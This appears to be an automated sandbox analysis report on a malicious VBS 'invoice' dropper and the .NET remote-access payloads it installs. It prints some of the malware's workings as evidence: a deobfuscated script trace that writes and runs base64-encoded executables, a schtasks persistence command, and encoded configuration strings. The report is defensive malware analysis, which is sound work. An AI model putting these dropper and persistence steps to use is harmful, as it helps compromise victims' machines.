Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Settings.cs	Base64 encoded string: 'zRlbkDV/H4IQoBSWA+od+Fo7vFBH6XGjYAE8lUUM1EgdgQ/dxZntjT1mcc5I8leIvIPIn+elqTA+hEinIzR/IA==', '/VvVX34V9tWm+vKyVZ9H+jroY9Sy/aAHhfTNJjSdeNrF3Fgc5YawIQW6zbZ5ubwiFr/xRkrp76tOkFGjHJZKOL2fo7aWPeRn4i7nueeakB8=', 'OrWq9hO36kOLoaNhl6j14kwqg/h20q8S7Yayyw9+JcoIZqzmQ6M3PdcQj7JMXoRgpsRUgE8UjS2jWrhKEZhCHErXU0RvwYoxBJMYsT7cQmY=', 'WBGHNRi8L9JUTsQXfJ0C9IC0E04SXD4/4X6vUBhmMQAo1WSxLrnQtYGHkd2IQunJ3KwIyQ4BGYEgtxMleHH4Esv6MX7v/JR54tfIV5lp6MJcJz4sT35rzz9DF3l1e22CLGS+ySIgX/lvgYQ3h2lTuaTJ1YuKFrxRZuH97cBTT7SMaL0PgJAfIfO42il12S7Cuo2mBdPjGyyQf8A8IWCJIW/J3tcwr8vHj6LtYjQ5qWayZj3KLPwtE0hJLGqSJqkP5ZaHJSFv0T2Tz0gIVCFZu+mgM4MvjdzSwFFohSYH/naQDzoUvcBsq4+v4EPoWVtUipI+B931z/+ilZR+LkxsT5Swmkfg3wYkC0lpHWoynkWLlV4XYYj5awWjaPCGkX92lu4/Z5enuGvQvQ8YZV2GKRLyhuR058QPw+cMPW2UIRYKFMz+Marm9/DobQ90eiXgaqJqcrAjyqgoijt8nKIY7ZIdmuozSeQDm0Jf5x6vE7zrGwXEi0luLrnlam3SQuo+gsi9pvB7hl4u+Zg3tBqCxOpGCtWShGbh3VSZSTVIYxn2gjzqnL+3dtW8B4iEOQJBXVd6tEKmDAVuotMCUA25sUE0qUHjFMMrVyh/W4ZJiXAiKVhnfGqoaqCZZjHHt1H3O8LD+NBuhuWFboc0t+4awY4Ve8BTG/5ZpzEwtLisZk1VWDq2jB0jeaPIs606P2/3+f86Ha9sqTeU5A6434fKlUTGvLbl68+6NMSOufOSE3YvEK6otNtaqbZAWxHj3DRUekhLNVLhVjQy7JkX9l1nWYKTGxZ56PanX62DStaqmApaDqifK79+HiEJTkIzYo37HFBtB6AgBQDhJ60NVhNJh20nxdKFaQeiHbh4wLwIOHVy2R4veZKCKjXMII4mw011rJ06Jj7Gb1V37HDYt1YSjXD7PPywVXETeerRsjQbPTDPVjI7raB+5UfCRtU+kLt4Oh6KgM6/7qTZKkZu39xpv4fz86QLFEDnDUpiY2tlZEMvPVxuW0CgF59b5wvNcdH6l3uRvMu0og8PdPiJ0KXeP6FUUlPrkttqHwyj4HxstPMjg4vtF9MZbpeq9eAJECXh0mp0nBH7/2MrhaGachvGPRk4Nnw0xbBxI0Xhu31n4nX7or01HcXoxOmOFz3qScR0aBPjufDnc2acw80RRginVe8t0tOsnHewrvje+wE10dfFI6C30365ofjAxysHcrMf/FRrG1rHbNm/Ez46jc4FqUdgxHdfKV9EJzJMGlIN45druJWv4hG4UBfcNORevQxK6PhLiw+tJD3NWV8mCDI3F3n6riz1yLIiUSFm5OZiMdA8tVzffDnu3xh0WzdmFd16unj8p6PBDZPDX6rokijCD0cidrC6cN+3Kvt0ATQszg+vnVA64X/RtPFc2mttuLOj7ZvUAatqx0raPBBXdkN+e/W4Pv+MB8WUUQSlN15JiFZwxtK7Td+Dg3peGH6RCedNFTgUYE5EdM2wyUu535beIOmKEMXEue0gBJpYI0QoA/3hb6ZsRdYilaX6mCWxTeCMjRLAYCppqTdhLie69ZlkN+988/MDGb6w3Z141+c+VCaXMZDnQ/QcILiHk5TXcv8/4mCd5VMeywJHl2u75/M3mSUYy/6GvUbwKrtzlJ38gw7EVBHe7NfK2JfEzvGjZ1dTi3XzKuql5TJHJyl+EmsoX3C2OUQ/o38l3s8t+eYyc4xHmMqXScpMnmZXWN9219miDvN2gh/v1bC0+k3r4+ocPGeuHe3eoAx1CE/weDFSIWza52uKLRS5fDyzcoiKjwJ14bdGbOnbhXEox05RQDSMG0H8htMKm6LBqq992w4DE3bPlrMkVXG/zcRn3BPgTfT/tvnxkbZORuSXct3fnsWKGPzwq1AG+sOu4276wVLpR9VH1aOmmkX0oCpsTGpvqD66+LbCGlLwHp0Oi1MQeeA9WkYBNctlKsrFrMPbmJAP7H5RTUeQ+fXNaOY0G7rwnmSWuCHk99EoowYMekK51IfqeuorZnXYzvphpBneIDOxhSmhPLftvKF0wFzL6hI/yygYxZgiILVWwrqFjduyQMUBiKNiFcxWQGXoS0IZEGwK3DmKa3o3OwgbzTjOf2XoELpDXvV2nSn7EP4Oj4Rohpw+SDqmNrfhdbE+mzmaukdYbZBhwCfSdqaDTxQdEWhpq65hL5dsgFgwUK8kVIqvL2pXkzJpqoFCwR9t8Vkz+UGKV9tFy0Quz5WtKbpzzf61OnKlRauCRCnsRrXH6NqjJiZ6n7V9gqhesNjN+Fcq6ddsfPyUJIXavmslk7OyhkUXn7auG5NJfTy6Y/lX7SNlyGOWVi0SD9Xe/xbrMbQflN9qaCw=', 'guaOpPvLUuTY1lGiMRcMdLKZx2lI+Z0hP1IEWzhfwOExZiFB7mJpRsbJNVbckUa6w/E7gsxM7nJ91FblGT+06XKUW1Zt8fn+EmcpaLTPFOHa71dd/dkgw4iKFll6uK0fEpjZKhw90nAvt7q7xo/Sn8kNd6Q0qObHLuFuVK8soCYl5X0s4Khla/FB4I+wTl53FnTbGqpBLjW3Fo28IFGoCdJxJ94Mom2WT2996GM3npHKsbmwtpDdlNfeiVucvSjXrwHp1p+vLXcyA+66jp0v5DBxnmiMHDZPPTLX81sNEZkQgdEAKfTn0Y0edIG6aaHTeEPdAkVioYo

.NET source code contains many API calls related to security

Source: dhcpmon.exe.4.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: dhcpmon.exe.4.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleBotKiller.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleBotKiller.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleBotKiller.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleBotKiller.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: ame.exe.1.dr, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: ame.exe.1.dr, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 3.2.ame.exe.500000.0.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 3.2.ame.exe.500000.0.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Notepads.exe.3.dr, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: Notepads.exe.3.dr, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 3.0.ame.exe.500000.0.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 3.0.ame.exe.500000.0.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleBotKiller.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleBotKiller.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: ame.exe.1.dr, Client/Handle_Packet/HandleBotKiller.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: ame.exe.1.dr, Client/Handle_Packet/HandleBotKiller.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleBotKiller.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleBotKiller.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Notepads.exe.3.dr, Client/Handle_Packet/HandleBotKiller.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: Notepads.exe.3.dr, Client/Handle_Packet/HandleBotKiller.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Classification label

Source: classification engine

Classification label: mal100.troj.spyw.evad.winVBS@14/9@20/3

Contains functionality to adjust token privileges (e.g. debug / backup)

Source: C:\Users\user\AppData\Local\Temp\fi.exe	Code function: 4_2_023410DA AdjustTokenPrivileges,		4_2_023410DA
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Code function: 4_2_023410A3 AdjustTokenPrivileges,		4_2_023410A3

Creates files inside the program directory

Source: C:\Users\user\AppData\Local\Temp\fi.exe

File created: C:\Program Files (x86)\DHCP Monitor

Jump to behavior

Creates files inside the user directory

Source: C:\Users\user\AppData\Local\Temp\ame.exe

File created: C:\Users\user\AppData\Roaming\Notepads.exe

Jump to behavior

Creates mutexes

Source: C:\Users\user\AppData\Roaming\Notepads.exe	Mutant created: \Sessions\1\BaseNamedObjects\871-085a33d91457
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{ac555290-50d4-4120-9390-e76e4f948dd7}
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5564:120:WilError_01
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\CLR_PerfMon_WrapMutex

Creates temporary files

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\ame.exe

Jump to behavior

Executes visual basic scripts

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Invoice No F1019855_PDF.vbs'

Parts of this applications are using the .NET runtime (Probably coded in C#)

Source: C:\Users\user\AppData\Local\Temp\ame.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp			Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Reads ini files

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Reads software policies

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Reads the hosts file

Source: C:\Users\user\AppData\Roaming\Notepads.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Sample is known by Antivirus

Source: Invoice No F1019855_PDF.vbs	Virustotal: Detection: 29%
Source: Invoice No F1019855_PDF.vbs	ReversingLabs: Detection: 23%

Spawns processes

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Invoice No F1019855_PDF.vbs'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\ame.exe 'C:\Users\user\AppData\Local\Temp\ame.exe'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\fi.exe 'C:\Users\user\AppData\Local\Temp\fi.exe'
Source: unknown	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs'
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process created: C:\Users\user\AppData\Roaming\Notepads.exe 'C:\Users\user\AppData\Roaming\Notepads.exe'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc onlogon /rl highest /tn Notepads.exe /tr 'C:\Users\user\AppData\Roaming\Notepads.exe
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Notepads.exe C:\Users\user\AppData\Roaming\Notepads.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\ame.exe 'C:\Users\user\AppData\Local\Temp\ame.exe'			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\fi.exe 'C:\Users\user\AppData\Local\Temp\fi.exe'			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs'			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process created: C:\Users\user\AppData\Roaming\Notepads.exe 'C:\Users\user\AppData\Roaming\Notepads.exe'			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc onlogon /rl highest /tn Notepads.exe /tr 'C:\Users\user\AppData\Roaming\Notepads.exe			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Uses Microsoft Silverlight

Source: C:\Users\user\AppData\Local\Temp\fi.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Uses new MSVCR Dlls

Source: C:\Users\user\AppData\Local\Temp\fi.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Binary contains paths to debug symbols

Source:

Binary string: mscorrc.pdb source: fi.exe, 00000004.00000002.600584281.0000000004C80000.00000002.00000001.sdmp

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: .Run("C:\Users\user\AppData\Local\Temp\ame.exe");IFileSystem3.GetSpecialFolder("2");IFolder.Path();IFileSystem3.GetSpecialFolder("2");IFolder.Path();IXMLDOMNode._00000029("tmp");IXMLDOMElement.dataType("bin.base64");IXMLDOMElement.text("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDALKNKPEAAAAAAAAAAOAAIgALATAAANIBAAAIAAAAAAAA7vE");IXMLDOMElement.nodeTypedValue();_Stream.Type("1");_Stream.Open();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\ame.exe", "2");IXMLDOMNode._00000029("tmp");IXMLDOMElement.dataType("bin.base64");IXMLDOMElement.text("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAKEn6VQAAAAAAAAAAOAADgELAQYAAMgBAABgAQAAAAAAkuc");IXMLDOMElement.nodeTypedValue();_Stream.Type("1");_Stream.Open();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\fi.exe", "2");IWshShell3.Run("C:\Users\user\AppData\Local\Temp\ame.exe");IWshShell3.Run("C:\Users\user\AppData\Local\Temp\fi.exe")

.NET source code contains potential unpacker

Source: ame.exe.1.dr, Client/Handle_Packet/HandlerRecovery.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: ame.exe.1.dr, Client/Handle_Packet/HandleLimeUSB.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: ame.exe.1.dr, Client/Handle_Packet/HandleSendTo.cs	.Net Code: SendToMemory System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: Notepads.exe.3.dr, Client/Handle_Packet/HandleSendTo.cs	.Net Code: SendToMemory System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: Notepads.exe.3.dr, Client/Handle_Packet/HandleLimeUSB.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: Notepads.exe.3.dr, Client/Handle_Packet/HandlerRecovery.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleSendTo.cs	.Net Code: SendToMemory System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandlerRecovery.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleLimeUSB.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandlerRecovery.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleLimeUSB.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleSendTo.cs	.Net Code: SendToMemory System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: dhcpmon.exe.4.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: dhcpmon.exe.4.dr, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandlerRecovery.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleLimeUSB.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleSendTo.cs	.Net Code: SendToMemory System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandlerRecovery.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleLimeUSB.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleSendTo.cs	.Net Code: SendToMemory System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Binary contains a suspicious time stamp

Source: ame.exe.1.dr

Static PE information: 0xF1288DB2 [Tue Mar 18 07:39:30 2098 UTC]

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\fi.exe

Code function: 4_2_022E5BA1 push E87220CAh; ret

4_2_022E5C26

.NET source code contains many randomly named methods

Source: dhcpmon.exe.4.dr, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
